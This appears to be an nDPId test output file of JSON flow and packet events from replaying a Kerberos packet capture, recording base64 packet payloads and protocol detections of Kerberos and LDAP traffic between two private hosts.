-00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1549337937690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937690,"pkt":"pB9ywglqAAgCHEeuCABFAAEyAM1AAIAGkAesEAjJrBAICMAbAYXq\/lHZFzDO61AYAQB3VwAADK3yhyWG\/w4ePjAcLdmQD9l5KJpA6NxzQuCtaFM+te5CWXRB5sUkdKJyUVp4kqyFJvIav1zvlLEwv\/M6QDvIyPip6cO\/Y7DDZ55OmD6IlKO8Nx5lANmfdaxcK4l74ZAlM45v2cQu8OV3yuWKq5L2jtnHunCltg9I9Mqjq93VmxUc7poK8vfSfY1YgBhAmlp0cXMsoyIbcEQodelj3wLBZ2oxItwV78GGNt7TlfW6joQ5wfkj6ZEyRFJn0CVihbNqYYKxBD44uauIJQKkPsQlzXsxooh9lhiWoZtuh5F2\/1LO7drek9zYg6pqUFpyhpL3WcFxh3R7Uuv9RQ5CYfOoVItdeOxn2w53bU0="} 
-00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1549337937691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937691,"pkt":"AAgCHEeupB9ywglqCABFAAD6E5tAAIAGfXGsEAgIrBAIyQGFwBsXMM7r6v5S41AYAQDOWAAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1JH5VWFTlwrbTZZZgbjZtW4QY+VaIr2rFT9\/AbDkv31Idx3xo24Bwzqv50t5zQXx7Id1H\/iLYt+nRqN0NWzCDJwnAfwcbOTGF30f3qnaqB+vDQ9EhQX38cpSy926C3lIc0Vkhc+VaaHdh510+B"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937700,"flow_last_seen":1549337937700,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937700,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1549337937700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"thread_ts_msec":1549337937700,"pkt":"pB9ywglqAAgCHEeuCABFAAEyANVAAIAGj\/+sEAjJrBAICMAcAYWCU2zwSN6TcFAYAQDS2QAAEgduSF05n8MFVjy4LWbkIsui7POF\/jI0fgAi3\/kn4+lZJrv4uo1Xj0IHKshBaLfyrICuzZtbBAFYjLvQz7y8gyRTfkwzadmnUFntTq1Eam1s4n2Qhfn1fuSUa5DAR1i941DEujmYu8fTZX3tp1hllqkxXisHcqSEIi8W9weLGXgpYEZYoErMkYejHKEeDmPCwQO6JC7sDmP8cAErQb7Rc88wLF4lFI7xOIE4FiH\/05afA1w9V5d1P2yDaGB6bADs\/c2xi7QKQuP+FixF4gof0ovK0nwq\/y7Hd27V4SQ4qHRNlXJex92QoEPhio00QFq1bLTnuvdcqFYcMu\/6\/tRVEcFKp0ezr7WF5MI="} -00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1549337937701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337937701,"pkt":"AAgCHEeupB9ywglqCABFAAD6E6JAAIAGfWqsEAgIrBAIyQGFwBxI3pNwglNt+lAYAQCvQgAAMIQAAADMAgEKYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG2EupGhqTVA+Kxm5vIdkbfFjlPoe8DmjpF\/p2I3j7EwFjqQzavz5jy+cGzZKn09a9y0dyj\/mpeHcqpjjORB3KYfxKGHrDmiKKSYiCwqx86ee7rLKiQPX2z3RSwNa4fWz8uAjgw+I5CkXYbP6rNu"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00776{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337937703,"pkt":"pB9ywglqAAgCHEeuCABFAAEXANlAAIAGkBasEAjJrBAICMAdAFjHhcaiuhdcXlAYAQCv5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBFIcW1KoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00826{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337937703,"pkt":"AAgCHEeupB9ywglqCABFAAE+E6VAAIAGfSOsEAgIrBAIyQBYwB26F1xex4XHkVAYAQDp0AAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg1NlqlBQIDBJWNpgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00731{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":45,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337937703,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337937724,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAN1AAIAGj8KsEAjJrBAICMAeAFgo\/29go\/Vk0VAYAQAVQgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4EwWkoanvLUiVA5eu8uG72\/EPy4+eHAiK9HbftleuqZ7DwBR\/wY3Sc5USTXPr6SJXdlLH8zfIE5MwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLSk9ITlNPTi1QQySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEUhxbUqgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} 
-00723{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337937724,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="} -00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1549337937726,"pkt":"AAgCHEeupB9ywglqCABFAABQE7BAAIAGfgasEAgIrBAIyQBYwB9iYc8DtUywR1AYAQDGTwAA4zLECSz5GZPNqNSL4T5BMx8WrZoQ8TiJymulR2VkZN3O1rD+5YXABg=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940431,"flow_last_seen":1549337940431,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337940431,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1549337940431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337940431,"pkt":"pB9ywglqAAgCHEeuCABFAACxAPpAAIAGkFusEAjJrBAICMAiAFjJGNiQqlyd6VAYAQDPPQAAiJisSNul39yNkXIaZ7I9abKKHsFn\/6nUnlpuYlwP2aMvOAIHPA5TwBaAhiWq+tFyYupNZpDDILw6OTtdBUx9AScUIqcHtp8iuHt0kMVzTn\/4u2MWOJ3B5oBzCaRbB4JGSnxRjDJCJirb6nGFgBI0LOLujBAlXiGb5mYfdXtWDkYlEBJfjMNCAaw="} -00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337940432,"pkt":"AAgCHEeupB9ywglqCABFAACbE79AAIAGfaysEAgIrBAIyQBYwCKqXKOdyRjZGVAYAQDDTwAAKYg87lVL35oh62EWNwE864\/2bfnOQr1tnnHZbVGEslhqWgqxgOlP8fU7tCl8Q\/Pa+OiAoCN8WQQSqJd8h73HLCORGVTkV2\/0V8MyUM0yQH1SL9l7PdXJm7IP\/IVn+E9KcR0nyC\/qPtxkWFJAw4YHnIb0GQ=="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940432,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":359,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":359,"midstream":1,"thread_ts_msec":1549337940432,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":413,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":413,"pkt_l4_len":379,"thread_ts_msec":1549337940432,"pkt":"pB9ywglqAAgCHEeuCABFAAGPAP5AAIAGj3msEAjJrBAICMAhwAMZWxyAQJkJXFAYAQAR1wAA1H5mUL0BcI4qPWGkggFYMIIBVKADAgESooIBSwSCAUcbieRVkdOtAnzmcyqLDK9HyZo8H6AcRFkR6nkpd0sYlEbV82Qt31YdF5lIivhvCiptxoXnMPhE44z2QYycXFRvcJlMUVHmYJTlGAPASSmrxcFRtfwGd3CmxLGHH6gdXYYGgEzOmFuOyHJjprxX+WUkbubIb9DuIaCyGfu6WjSvDsJsxl8APFvUDVpwKCBx+yi4Nl7uparYkV7uyBIsOfius8LRX8aNw6uyL8Rg7Kcy+u\/AdDO7DcqqeIW4ECzaDnKuMDvhoDG1L4DC3Gyq10cUmszgrrBDkGwYBF3I07gVPaOITvdzOarlv0eTNHIPNCN07gmcrX\/ElHpPLwV7ZiI5SB1SY8Op3qesfZqAIqjOBGiyQU2+uy5qrSSffZHU9iojHh1BosRxcA7pQ15VJkC0LtUsgQyMbCX0W85YmDAFmZqe2ZivqK8="} -00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337940433,"pkt":"AAgCHEeupB9ywglqCABFAAFEE8NAAIAGfP+sEAgIrBAIycADwCFAmQlcGVsd51AYAQDbOQAABQAMBxAAAAAcAagAAgAAANAW0BaIIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8Ebfn2lEYLCMVIVfFxnfrMpLLQ5jje4X2obHkLE1mHLBb3QYmIfBpDW5VyIgGbPY54D9aSU3VouXp90Sdg8ibesBCnHqUH+HJX\/hdQ0brTNgFSTOR\/m3sdIfIuZmQkzV3dPMC5PlxnwhbW8ZWYvQE="} 
-00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 
-00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"} -00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"} 
-00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}} 